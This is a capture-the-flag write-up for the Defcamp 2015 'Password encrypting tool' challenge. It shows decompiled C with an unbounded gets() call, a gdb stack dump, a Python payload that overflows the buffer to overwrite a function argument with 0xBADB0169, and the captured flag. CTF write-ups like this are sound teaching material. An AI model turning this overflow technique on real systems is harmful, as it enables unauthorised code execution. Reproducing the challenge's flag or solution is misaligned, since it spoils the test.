Tags: exploitation reverse engineering 

Rating:

# Password encrypting tool (Exploit 100)

## Problem

Our second newest programmer created a tool so that we can encrypt our usual passwords and use more secure ones wherever we register new accounts. He said that he left some sort of an easter egg that could leverage you, but he doesn't really expect anyone to get it. You are the newest programmer, can you find it and prove him you are the one?

Hack the target when you've figured out with this file.

## Analysis & Solution
Credit: [@gellin](https://github.com/gellin)

```
root@kali:~/Desktop# file e100
e100: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4410355efef2e99ac54e4028dba1b3e40d055fee, stripped
```
Next we dropped it into IDA32 and found the two interesting functions.
This appears to be the important part of the code, it seems to contain an easter egg. It appears that if we can somehow overflow the value 0xDADADADA that was passed into function `sub_80484FD` it will give us the flag.

```
int sub_80485A4()
{
sub_80484FD(0xDADADADA);
return 0;
}

//the address of the comparison to break point
.text:08048526 cmp [ebp+arg_0], 0BADB0169h

int __cdecl sub_80484FD(int a1)
{
size_t i; // [sp+18h] [bp-30h]@3
char s[32]; // [sp+1Ch] [bp-2Ch]@1
int v4; // [sp+3Ch] [bp-Ch]@1

v4 = *MK_FP(__GS__, 20);
printf("Enter password: ");
gets(s);
if ( a1 == 0xBADB0169 ) //0x8048526 cmp [ebp+arg_0], 0BADB0169h
{
system("cat flag"); //right here is the easter egg, al is set as 0xDADADADA it needs to be 0xBADB0169 to trigger the easter egg
}
else
{
for ( i = 0; i < strlen(s); ++i )
s[i] ^= a1;
printf("Your new secure password is: ");
printf(s);
}
return *MK_FP(__GS__, 20) ^ v4;
}
```

Lets breakpoint the comparison at `0x8048526` and see if we can find `0xDADADADA` in the stack and smash it!

```
root@kali:~/Desktop# gdb ./e100
(gdb) b* 0x8048526
Breakpoint 1 at 0x8048526
(gdb) r
Starting program: /root/Desktop/e100
Enter password: AAAAAAAAAAA

Breakpoint 1, 0x08048526 in ?? ()
(gdb) x/64x $esp
0xffffd400: 0xffffd41c 0x00000000 0x000000c2 0xf7ea0586
0xffffd410: 0xffffffff 0xffffd43e 0xf7e18bf8 0x41414141
0xffffd420: 0x41414141 0x00414141 0x00000001 0x08048361
0xffffd430: 0xffffd664 0x0000002f 0x0804a000 0xfc148e00
0xffffd440: 0x00000001 0xf7fb2000 0xffffd468 0x080485b9
0xffffd450: 0xdadadada 0xf7ffd000 0x080485cb 0xf7fb2000 //BINGO at the start of this line
0xffffd460: 0x080485c0 0x00000000 0x00000000 0xf7e25a63
0xffffd470: 0x00000001 0xffffd504 0xffffd50c 0xf7feb7da
0xffffd480: 0x00000001 0xffffd504 0xffffd4a4 0x0804a024
0xffffd490: 0x0804825c 0xf7fb2000 0x00000000 0x00000000
0xffffd4a0: 0x00000000 0x17bd6a4a 0x2ca1ce5a 0x00000000
0xffffd4b0: 0x00000000 0x00000000 0x00000001 0x08048400
0xffffd4c0: 0x00000000 0xf7ff1020 0xf7e25979 0xf7ffd000
0xffffd4d0: 0x00000001 0x08048400 0x00000000 0x08048421
0xffffd4e0: 0x080485a4 0x00000001 0xffffd504 0x080485c0
0xffffd4f0: 0x08048630 0xf7febc90 0xffffd4fc 0x0000001c
(gdb) c
Continuing.
Your new secure password is: �����������[Inferior 1 (process 4438) exited normally]
(gdb) r
Starting program: /root/Desktop/e100
Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x08048526 in ?? ()
(gdb) x/64x $esp
0xffffd400: 0xffffd41c 0x00000000 0x000000c2 0xf7ea0586
0xffffd410: 0xffffffff 0xffffd43e 0xf7e18bf8 0x41414141
0xffffd420: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd430: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd440: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd450: 0x41414141 0x41414141 0x41414141 0xf7004141 //:OOO we can smash it
0xffffd460: 0x080485c0 0x00000000 0x00000000 0xf7e25a63
0xffffd470: 0x00000001 0xffffd504 0xffffd50c 0xf7feb7da
0xffffd480: 0x00000001 0xffffd504 0xffffd4a4 0x0804a024
0xffffd490: 0x0804825c 0xf7fb2000 0x00000000 0x00000000
0xffffd4a0: 0x00000000 0x50fcfb1c 0x6be05f0c 0x00000000
0xffffd4b0: 0x00000000 0x00000000 0x00000001 0x08048400
0xffffd4c0: 0x00000000 0xf7ff1020 0xf7e25979 0xf7ffd000
0xffffd4d0: 0x00000001 0x08048400 0x00000000 0x08048421
0xffffd4e0: 0x080485a4 0x00000001 0xffffd504 0x080485c0
0xffffd4f0: 0x08048630 0xf7febc90 0xffffd4fc 0x0000001c
(gdb) Quit
```

So we write up

```
import struct
print "A"*52+struct.pack('I', 0xBADB0169)
````

Once supplied as the password the server responds with `DCTF{3671bacdb5ea5bc26982df7da6de196e}`

Original writeup (https://github.com/RandomsCTF/write-ups/tree/master/Defcamp%20CTF%20Qualification%202015/Password%20encrypting%20tool%20%5Bexploit%5D%20(100)).